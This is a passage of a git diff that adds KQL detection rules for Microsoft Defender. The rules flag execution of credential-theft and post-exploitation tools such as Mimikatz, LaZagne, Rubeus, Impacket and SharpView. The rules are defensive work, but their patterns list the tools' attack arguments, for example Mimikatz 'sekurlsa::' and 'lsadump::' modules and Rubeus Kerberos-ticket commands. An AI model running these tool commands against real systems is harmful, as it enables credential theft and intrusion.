FolderPath contains "\\Windows\\addins\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\")) or FolderPath endswith "\\lazagne.exe") or ((ProcessCommandLine contains " all " or ProcessCommandLine contains " browsers " or ProcessCommandLine contains " chats " or ProcessCommandLine contains " databases " or ProcessCommandLine contains " games " or ProcessCommandLine contains " mails " or ProcessCommandLine contains " maven " or ProcessCommandLine contains " memory " or ProcessCommandLine contains " multimedia " or ProcessCommandLine contains " php " or ProcessCommandLine contains " svn " or ProcessCommandLine contains " sysadmin " or ProcessCommandLine contains " unused " or ProcessCommandLine contains " wifi ") and (ProcessCommandLine contains "-1Password" or ProcessCommandLine contains "-apachedirectorystudio" or ProcessCommandLine contains "-autologon" or ProcessCommandLine contains "-ChromiumBased" or ProcessCommandLine contains "-coreftp" or ProcessCommandLine contains "-credfiles" or ProcessCommandLine contains "-credman" or ProcessCommandLine contains "-cyberduck" or ProcessCommandLine contains "-dbvis" or ProcessCommandLine contains "-EyeCon" or ProcessCommandLine contains "-filezilla" or ProcessCommandLine contains "-filezillaserver" or ProcessCommandLine contains "-ftpnavigator" or ProcessCommandLine contains "-galconfusion" or ProcessCommandLine contains "-gitforwindows" or ProcessCommandLine contains "-hashdump" or ProcessCommandLine contains "-iisapppool" or ProcessCommandLine contains "-IISCentralCertP" or ProcessCommandLine contains "-kalypsomedia" or ProcessCommandLine contains "-keepass" or ProcessCommandLine contains "-keepassconfig" or ProcessCommandLine contains "-lsa_secrets" or ProcessCommandLine contains "-mavenrepositories" or ProcessCommandLine contains "-memory_dump" or ProcessCommandLine contains "-Mozilla" or ProcessCommandLine contains "-mRemoteNG" or ProcessCommandLine contains "-mscache" or ProcessCommandLine contains "-opensshforwindows" or ProcessCommandLine contains "-openvpn" or ProcessCommandLine contains "-outlook" or ProcessCommandLine contains "-pidgin" or ProcessCommandLine contains "-postgresql" or ProcessCommandLine contains "-psi-im" or ProcessCommandLine contains "-puttycm" or ProcessCommandLine contains "-pypykatz" or ProcessCommandLine contains "-Rclone" or ProcessCommandLine contains "-rdpmanager" or ProcessCommandLine contains "-robomongo" or ProcessCommandLine contains "-roguestale" or ProcessCommandLine contains "-skype" or ProcessCommandLine contains "-SQLDeveloper" or ProcessCommandLine contains "-squirrel" or ProcessCommandLine contains "-tortoise" or ProcessCommandLine contains "-turba" or ProcessCommandLine contains "-UCBrowser" or ProcessCommandLine contains "-unattended" or ProcessCommandLine contains "-vault" or ProcessCommandLine contains "-vaultfiles" or ProcessCommandLine contains "-vnc" or ProcessCommandLine contains "-winscp"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_mimikatz_execution.kql b/KQL/rules/windows/process_creation/hacktool_mimikatz_execution.kql
new file mode 100644
index 00000000..51120b1c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_mimikatz_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Mimikatz Execution
+// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton
+// Date: 2019-10-22
+// Level: high
+// Description: Detection well-known mimikatz command line arguments
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "::aadcookie" or ProcessCommandLine contains "::detours" or ProcessCommandLine contains "::memssp" or ProcessCommandLine contains "::mflt" or ProcessCommandLine contains "::ncroutemon" or ProcessCommandLine contains "::ngcsign" or ProcessCommandLine contains "::printnightmare" or ProcessCommandLine contains "::skeleton" or ProcessCommandLine contains "::preshutdown" or ProcessCommandLine contains "::mstsc" or ProcessCommandLine contains "::multirdp") or (ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "crypto::" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "process::" or ProcessCommandLine contains "vault::") or (ProcessCommandLine contains "DumpCreds" or ProcessCommandLine contains "mimikatz")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_pchunter_execution.kql b/KQL/rules/windows/process_creation/hacktool_pchunter_execution.kql
new file mode 100644
index 00000000..f0e70f52
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_pchunter_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - PCHunter Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
+// Date: 2022-10-10
+// Level: high
+// Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.discovery, attack.t1082, attack.t1057, attack.t1012, attack.t1083, attack.t1007
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((SHA1 startswith "5F1CBC3D99558307BC1250D084FA968521482025" or SHA1 startswith "3FB89787CB97D902780DA080545584D97FB1C2EB") or (MD5 startswith "987B65CD9B9F4E9A1AFD8F8B48CF64A7" or MD5 startswith "228DD0C2E6287547E26FFBD973A40F14") or (SHA256 startswith "2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32" or SHA256 startswith "55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C")) or (FolderPath endswith "\\PCHunter64.exe" or FolderPath endswith "\\PCHunter32.exe") or (ProcessVersionInfoOriginalFileName =~ "PCHunter.exe" or ProcessVersionInfoFileDescription =~ "Epoolsoft Windows Information View Tools")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_potential_impacket_lateral_movement_activity.kql b/KQL/rules/windows/process_creation/hacktool_potential_impacket_lateral_movement_activity.kql
new file mode 100644
index 00000000..664ddad5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_potential_impacket_lateral_movement_activity.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Potential Impacket Lateral Movement Activity
+// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
+// Date: 2019-09-03
+// Level: high
+// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_powertool_execution.kql b/KQL/rules/windows/process_creation/hacktool_powertool_execution.kql
new file mode 100644
index 00000000..cb3a9825
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_powertool_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - PowerTool Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-29
+// Level: high
+// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\PowerTool.exe" or FolderPath endswith "\\PowerTool64.exe") or ProcessVersionInfoOriginalFileName =~ "PowerTool.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_purplesharp_execution.kql b/KQL/rules/windows/process_creation/hacktool_purplesharp_execution.kql
new file mode 100644
index 00000000..1e1b3d91
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_purplesharp_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - PurpleSharp Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-06-18
+// Level: critical
+// Description: Detects the execution of the PurpleSharp adversary simulation tool
+// MITRE Tactic: Resource Development
+// Tags: attack.t1587, attack.resource-development
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "xyz123456.exe" or ProcessCommandLine contains "PurpleSharp") or (FolderPath contains "\\purplesharp" or ProcessVersionInfoOriginalFileName =~ "PurpleSharp.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_pypykatz_credentials_dumping_activity.kql b/KQL/rules/windows/process_creation/hacktool_pypykatz_credentials_dumping_activity.kql
new file mode 100644
index 00000000..6a049c08
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_pypykatz_credentials_dumping_activity.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Pypykatz Credentials Dumping Activity
+// Author: frack113
+// Date: 2022-01-05
+// Level: high
+// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "live" and ProcessCommandLine contains "registry") and (FolderPath endswith "\\pypykatz.exe" or FolderPath endswith "\\python.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_quarks_pwdump_execution.kql b/KQL/rules/windows/process_creation/hacktool_quarks_pwdump_execution.kql
new file mode 100644
index 00000000..38dbfc39
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_quarks_pwdump_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Quarks PwDump Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-05
+// Level: high
+// Description: Detects usage of the Quarks PwDump tool via commandline arguments
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine in~ (" -dhl", " --dump-hash-local", " -dhdc", " --dump-hash-domain-cached", " --dump-bitlocker", " -dhd ", " --dump-hash-domain ", "--ntds-file")) or FolderPath endswith "\\QuarksPwDump.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_redmimicry_winnti_playbook_execution.kql b/KQL/rules/windows/process_creation/hacktool_redmimicry_winnti_playbook_execution.kql
new file mode 100644
index 00000000..7d633d59
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_redmimicry_winnti_playbook_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - RedMimicry Winnti Playbook Execution
+// Author: Alexander Rausch
+// Date: 2020-06-24
+// Level: high
+// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1106, attack.t1059.003, attack.t1218.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_remotekrbrelay_execution.kql b/KQL/rules/windows/process_creation/hacktool_remotekrbrelay_execution.kql
new file mode 100644
index 00000000..fe699bbb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_remotekrbrelay_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - RemoteKrbRelay Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-27
+// Level: high
+// Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\RemoteKrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "RemoteKrbRelay.exe") or (ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -target " and ProcessCommandLine contains " -victim ") or (ProcessCommandLine contains "-rbcd " and (ProcessCommandLine contains "-cn " or ProcessCommandLine contains "--computername ")) or (ProcessCommandLine contains "-chp " and (ProcessCommandLine contains "-chpPass " and ProcessCommandLine contains "-chpUser ")) or (ProcessCommandLine contains "-addgroupmember " and ProcessCommandLine contains "-group " and ProcessCommandLine contains "-groupuser ") or ((ProcessCommandLine contains "interactive" or ProcessCommandLine contains "secrets" or ProcessCommandLine contains "service-add") and (ProcessCommandLine contains "-smb " and ProcessCommandLine contains "--smbkeyword "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_rubeus_execution.kql b/KQL/rules/windows/process_creation/hacktool_rubeus_execution.kql
new file mode 100644
index 00000000..5a850327
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_rubeus_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Rubeus Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-12-19
+// Level: critical
+// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1003, attack.t1558.003, attack.lateral-movement, attack.t1550.003
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_safetykatz_execution.kql b/KQL/rules/windows/process_creation/hacktool_safetykatz_execution.kql
new file mode 100644
index 00000000..0ee7f2e0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_safetykatz_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SafetyKatz Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-20
+// Level: critical
+// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SafetyKatz.exe" or ProcessVersionInfoOriginalFileName =~ "SafetyKatz.exe" or ProcessVersionInfoFileDescription =~ "SafetyKatz"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_securityxploded_execution.kql b/KQL/rules/windows/process_creation/hacktool_securityxploded_execution.kql
new file mode 100644
index 00000000..75abef80
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_securityxploded_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SecurityXploded Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-12-19
+// Level: critical
+// Description: Detects the execution of SecurityXploded Tools
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessVersionInfoCompanyName =~ "SecurityXploded" or FolderPath endswith "PasswordDump.exe" or ProcessVersionInfoOriginalFileName endswith "PasswordDump.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpchisel_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpchisel_execution.kql
new file mode 100644
index 00000000..c3d5e371
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpchisel_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SharpChisel Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-05
+// Level: high
+// Description: Detects usage of the Sharp Chisel via the commandline arguments
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SharpChisel.exe" or ProcessVersionInfoProductName =~ "SharpChisel"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpdpapi_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpdpapi_execution.kql
new file mode 100644
index 00000000..58362b4a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpdpapi_execution.kql
@@ -0,0 +1,11 @@
+// Title: HackTool - SharpDPAPI Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-26
+// Level: high
+// Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.
+// SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\SharpDPAPI.exe" or ProcessVersionInfoOriginalFileName =~ "SharpDPAPI.exe") or ((ProcessCommandLine contains " backupkey " or ProcessCommandLine contains " blob " or ProcessCommandLine contains " certificates " or ProcessCommandLine contains " credentials " or ProcessCommandLine contains " keepass " or ProcessCommandLine contains " masterkeys " or ProcessCommandLine contains " rdg " or ProcessCommandLine contains " vaults ") and ((ProcessCommandLine contains " /file:" or ProcessCommandLine contains " /machine" or ProcessCommandLine contains " /mkfile:" or ProcessCommandLine contains " /password:" or ProcessCommandLine contains " /pvk:" or ProcessCommandLine contains " /server:" or ProcessCommandLine contains " /target:" or ProcessCommandLine contains " /unprotect") or (ProcessCommandLine contains " {" and ProcessCommandLine contains "}:")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpersist_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpersist_execution.kql
new file mode 100644
index 00000000..a67a7260
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpersist_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharPersist Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-15
+// Level: high
+// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -t schtask -c " or ProcessCommandLine contains " -t startupfolder -c ") or (ProcessCommandLine contains " -t reg -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t service -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t schtask -c " and ProcessCommandLine contains " -m add") or (FolderPath endswith "\\SharPersist.exe" or ProcessVersionInfoProductName =~ "SharPersist")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpevtmute_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpevtmute_execution.kql
new file mode 100644
index 00000000..2c0342aa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpevtmute_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpEvtMute Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-07
+// Level: high
+// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SharpEvtMute.exe" or ProcessVersionInfoFileDescription =~ "SharpEvtMute" or (ProcessCommandLine contains "--Filter \"rule " or ProcessCommandLine contains "--Encoded --Filter \\\"")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpimpersonation_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpimpersonation_execution.kql
new file mode 100644
index 00000000..3446ac0f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpimpersonation_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpImpersonation Execution
+// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-27
+// Level: high
+// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpldapmonitor_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpldapmonitor_execution.kql
new file mode 100644
index 00000000..23bd8274
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpldapmonitor_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpLDAPmonitor Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-30
+// Level: medium
+// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/dcip:") or (FolderPath endswith "\\SharpLDAPmonitor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpLDAPmonitor.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpldapwhoami_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpldapwhoami_execution.kql
new file mode 100644
index 00000000..c1d91ab5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpldapwhoami_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SharpLdapWhoami Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-29
+// Level: high
+// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+// False Positives:
+//   - Programs that use the same command line flags
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " /method:ntlm" or ProcessCommandLine endswith " /method:kerb" or ProcessCommandLine endswith " /method:nego" or ProcessCommandLine endswith " /m:nego" or ProcessCommandLine endswith " /m:ntlm" or ProcessCommandLine endswith " /m:kerb") or FolderPath endswith "\\SharpLdapWhoami.exe" or (ProcessVersionInfoOriginalFileName contains "SharpLdapWhoami" or ProcessVersionInfoProductName =~ "SharpLdapWhoami")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpmove_tool_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpmove_tool_execution.kql
new file mode 100644
index 00000000..d6473d29
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpmove_tool_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpMove Tool Execution
+// Author: Luca Di Bartolomeo (CrimpSec)
+// Date: 2024-01-29
+// Level: high
+// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\SharpMove.exe" or ProcessVersionInfoOriginalFileName =~ "SharpMove.exe") or ((ProcessCommandLine contains "action=create" or ProcessCommandLine contains "action=dcom" or ProcessCommandLine contains "action=executevbs" or ProcessCommandLine contains "action=hijackdcom" or ProcessCommandLine contains "action=modschtask" or ProcessCommandLine contains "action=modsvc" or ProcessCommandLine contains "action=query" or ProcessCommandLine contains "action=scm" or ProcessCommandLine contains "action=startservice" or ProcessCommandLine contains "action=taskscheduler") and ProcessCommandLine contains "computername=")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpup_privesc_tool_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpup_privesc_tool_execution.kql
new file mode 100644
index 00000000..3f8e0627
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpup_privesc_tool_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpUp PrivEsc Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-20
+// Level: critical
+// Description: Detects the use of SharpUp, a tool for local privilege escalation
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.discovery, attack.execution, attack.t1615, attack.t1569.002, attack.t1574.005
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SharpUp.exe" or ProcessVersionInfoFileDescription =~ "SharpUp" or (ProcessCommandLine contains "HijackablePaths" or ProcessCommandLine contains "UnquotedServicePath" or ProcessCommandLine contains "ProcessDLLHijack" or ProcessCommandLine contains "ModifiableServiceBinaries" or ProcessCommandLine contains "ModifiableScheduledTask" or ProcessCommandLine contains "DomainGPPPassword" or ProcessCommandLine contains "CachedGPPPassword")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpview_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpview_execution.kql
new file mode 100644
index 00000000..200d5400
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpview_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpView Execution
+// Author: frack113
+// Date: 2021-12-10
+// Level: high
+// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "SharpView.exe" or FolderPath endswith "\\SharpView.exe" or (ProcessCommandLine contains "Add-RemoteConnection" or ProcessCommandLine contains "Convert-ADName" or ProcessCommandLine contains "ConvertFrom-SID" or ProcessCommandLine contains "ConvertFrom-UACValue" or ProcessCommandLine contains "Convert-SidToName" or ProcessCommandLine contains "Export-PowerViewCSV" or ProcessCommandLine contains "Find-DomainObjectPropertyOutlier" or ProcessCommandLine contains "Find-DomainProcess" or ProcessCommandLine contains "Find-DomainShare" or ProcessCommandLine contains "Find-DomainUserEvent" or ProcessCommandLine contains "Find-DomainUserLocation" or ProcessCommandLine contains "Find-ForeignGroup" or ProcessCommandLine contains "Find-ForeignUser" or ProcessCommandLine contains "Find-GPOComputerAdmin" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-Interesting" or ProcessCommandLine contains "Find-LocalAdminAccess" or ProcessCommandLine contains "Find-ManagedSecurityGroups" or ProcessCommandLine contains "Get-CachedRDPConnection" or ProcessCommandLine contains "Get-DFSshare" or ProcessCommandLine contains "Get-DomainComputer" or ProcessCommandLine contains "Get-DomainController" or ProcessCommandLine contains "Get-DomainDFSShare" or ProcessCommandLine contains "Get-DomainDNSRecord" or ProcessCommandLine contains "Get-DomainFileServer" or ProcessCommandLine contains "Get-DomainForeign" or ProcessCommandLine contains "Get-DomainGPO" or ProcessCommandLine contains "Get-DomainGroup" or ProcessCommandLine contains "Get-DomainGUIDMap" or ProcessCommandLine contains "Get-DomainManagedSecurityGroup" or ProcessCommandLine contains "Get-DomainObject" or ProcessCommandLine contains "Get-DomainOU" or ProcessCommandLine contains "Get-DomainPolicy" or ProcessCommandLine contains "Get-DomainSID" or ProcessCommandLine contains "Get-DomainSite" or ProcessCommandLine contains "Get-DomainSPNTicket" or ProcessCommandLine contains "Get-DomainSubnet" or ProcessCommandLine contains "Get-DomainTrust" or ProcessCommandLine contains "Get-DomainUserEvent" or ProcessCommandLine contains "Get-ForestDomain" or ProcessCommandLine contains "Get-ForestGlobalCatalog" or ProcessCommandLine contains "Get-ForestTrust" or ProcessCommandLine contains "Get-GptTmpl" or ProcessCommandLine contains "Get-GroupsXML" or ProcessCommandLine contains "Get-LastLoggedOn" or ProcessCommandLine contains "Get-LoggedOnLocal" or ProcessCommandLine contains "Get-NetComputer" or ProcessCommandLine contains "Get-NetDomain" or ProcessCommandLine contains "Get-NetFileServer" or ProcessCommandLine contains "Get-NetForest" or ProcessCommandLine contains "Get-NetGPO" or ProcessCommandLine contains "Get-NetGroupMember" or ProcessCommandLine contains "Get-NetLocalGroup" or ProcessCommandLine contains "Get-NetLoggedon" or ProcessCommandLine contains "Get-NetOU" or ProcessCommandLine contains "Get-NetProcess" or ProcessCommandLine contains "Get-NetRDPSession" or ProcessCommandLine contains "Get-NetSession" or ProcessCommandLine contains "Get-NetShare" or ProcessCommandLine contains "Get-NetSite" or 